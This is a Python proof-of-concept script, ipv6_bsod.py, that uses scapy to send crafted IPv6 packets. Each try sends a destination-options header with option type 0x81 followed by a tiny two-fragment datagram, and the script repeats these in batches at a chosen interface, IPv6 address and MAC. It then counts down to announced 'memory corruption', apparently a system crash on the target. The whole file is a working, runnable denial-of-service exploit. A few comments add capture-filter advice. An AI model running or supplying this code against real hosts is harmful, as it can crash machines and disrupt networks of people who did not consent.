ipv6_bsod.py 3.3 KB

  1. from scapy.all import *
  2. from sys import argv, exit
def usage():
    """Print the one-line command-line synopsis to stdout."""
    synopsis = "Usage: ipv6_bsod -i (interface) --ip (ipaddr) -m (macaddr) -t (num_tries) -n (num_batches)"
    print(synopsis)
def get_packets(i: int, ip: str, mac: str) -> list:
    """Build the three-packet IPv6 sequence this proof of concept emits per try.

    On the wire the sequence is, in order:

    1. an unfragmented packet carrying a Destination Options header whose
       single option has its type byte overridden to 0x81 (scapy ``PadN``
       with ``otype=0x81``, three bytes of option data);
    2. a first fragment (``m=1``, ``offset=0``) with eight payload bytes;
    3. a last fragment (``m=0``, ``offset=1``) with no payload, reusing the
       identification of packet 2.

    All three carry flow label 1 and hop limit ``64 + i``; the fragment
    identification is ``0xdebac1e + i``. Those constants and the ``'a'``
    filler are choices of this script, so a capture filter or IDS rule is
    better keyed on the structure (unknown-type destination option followed
    by a tiny two-fragment datagram to the same host) than on the values.
    The page names no advisory or affected versions.

    Args:
        i: Per-try index, added to the hop limit and the fragment id.
        ip: Destination IPv6 address; must be non-empty.
        mac: Destination MAC. When non-empty each packet gets an ``Ether``
            header; when empty the packets start at the IPv6 layer.

    Returns:
        ``[options_packet, first_fragment, last_fragment]``.

    Exits with status 1 (after printing an error) when ``ip`` is empty.
    """
    if ip == '':
        print("Error: IP address is not set!")
        exit(1)

    frag_id = 0xdebac1e + i

    def outer():
        # A fresh header stack per packet; the Ether layer is present only
        # when a destination MAC was supplied.
        if mac != '':
            return Ether(dst=mac) / IPv6(fl=1, hlim=64+i, dst=ip)
        return IPv6(fl=1, hlim=64+i, dst=ip)

    options_packet = outer() / IPv6ExtHdrDestOpt(options=[PadN(otype=0x81, optdata='a'*3)])
    first_fragment = outer() / IPv6ExtHdrFragment(id=frag_id, m=1, offset=0) / 'aaaaaaaa'
    # offset is counted in 8-octet units, so 1 sits right after the 8 bytes above.
    last_fragment = outer() / IPv6ExtHdrFragment(id=frag_id, m=0, offset=1)
    return [options_packet, first_fragment, last_fragment]
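# Script driver: parse the command line, build the packet list with
# get_packets(), hand it to scapy, then print a 60-second countdown.
if len(argv) == 1:
    usage()
else:
    iface = ''
    ip = ''
    mac = ''
    num_tries = 0
    num_batches = 0
    # Hand-rolled parser: flags are expected at odd argv positions, each
    # followed by its value, hence the step of 2.
    for a in range(1, len(argv), 2):
        if argv[a] == "-i":
            if len(argv) > a+1:
                iface = argv[a+1]
            else:
                print("Error: interface is not set")
                exit(1)
        elif argv[a] == '--ip':
            if len(argv) > a+1:
                ip = argv[a+1]
            else:
                print("Error: IP is not set")
                exit(1)
        elif argv[a] == '-m':
            if len(argv) > a+1:
                mac = argv[a+1]
            else:
                print("Error: MAC address is not set")
                exit(1)
        elif argv[a] == '-t':
            if len(argv) > a+1:
                # isdigit() admits only unsigned digit strings, so signs and
                # decimals are rejected here.
                if argv[a+1].isdigit():
                    num_tries = int(argv[a+1])
                else:
                    print("Error: num_tries is not number, exiting...")
                    exit(1)
            else:
                print("Error: num_tries is not set")
                # Abort like every other flag does. Previously this branch
                # only printed, so a trailing bare -t after an earlier valid
                # -t was reported as an error and then silently accepted.
                exit(1)
        elif argv[a] == '-n':
            if len(argv) > a+1:
                if argv[a+1].isdigit():
                    num_batches = int(argv[a+1])
                else:
                    print("Error: num_batches is not number, exiting...")
                    exit(1)
            else:
                print("Error: num_batches is not set")
                exit(1)
        else:
            print(f"Error: invalid key '{argv[a]}'")
            exit(1)

    # The MAC address is the only optional setting. 0 doubles as the
    # "not set" sentinel, so an explicit `-t 0` or `-n 0` is reported as unset.
    if iface == '':
        print("Error: interface is not set")
        exit(1)
    if ip == '':
        print("Error: IPv6 address is not set")
        exit(1)
    if num_tries == 0:
        print("Error: num_tries is not set")
        exit(1)
    if num_batches == 0:
        print("Error: num_batches is not set")
        exit(1)

    # The whole list is built in memory before anything is sent: each try
    # contributes the three-packet sequence twice, i.e.
    # 6 * num_tries * num_batches packets in total.
    final_ps = []
    for _ in range(num_batches):
        for i in range(num_tries):
            final_ps += get_packets(i, ip, mac) + get_packets(i, ip, mac)

    print("Sending packets")
    # sendp() emits layer-2 frames (the packets carry an Ether header when a
    # MAC was given); send() emits at layer 3.
    if mac != '':
        sendp(final_ps, iface)
    else:
        send(final_ps, iface)

    # Nothing is transmitted during this loop; it only waits and prints.
    # For correlation, any crash would lag the traffic by about a minute.
    # 60 s is also the fragment reassembly timeout in RFC 8200, presumably
    # why the author waits this long; the page does not say.
    # NOTE(review): `time` is not imported explicitly in the visible header;
    # presumably it arrives via the scapy star import - confirm.
    for i in range(60):
        print(f"Memory corruption will be triggered in {60-i} seconds", end='\r')
        time.sleep(1)
    print("")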